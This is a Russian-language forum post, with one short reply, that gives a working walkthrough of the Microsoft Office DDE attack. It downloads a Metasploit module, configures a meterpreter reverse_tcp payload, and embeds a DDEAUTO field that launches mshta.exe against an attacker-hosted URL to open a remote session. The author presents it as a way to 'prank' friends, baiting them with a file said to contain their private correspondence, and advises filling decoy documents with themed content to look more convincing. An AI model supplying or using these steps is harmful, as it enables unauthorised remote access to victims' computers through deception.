torx777 23 Теория DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл) Установка Необходимые составляющие для проведения атаки: Устройство с Kali Linux. Устройство с Windows. Microsoft Office (Word). Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды: wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Далее добавим эту утилиту в папку с эксплоитами Metasploit: mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей: msfconsole reload_all После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды: use exploit/windows/dde_delivery Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом: set SRVHOST 192.168.177.141 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.177.141 set LPORT 6708 exploit exploit Подготавливаем документ MS Office После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9). {DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”} После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями. Готовая ссылка Получаем сессию Заключение Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять документы тематическим содержанием. 5 Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
k1x 3 Такое чувство , будто статья вырвана из контекста 3 Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
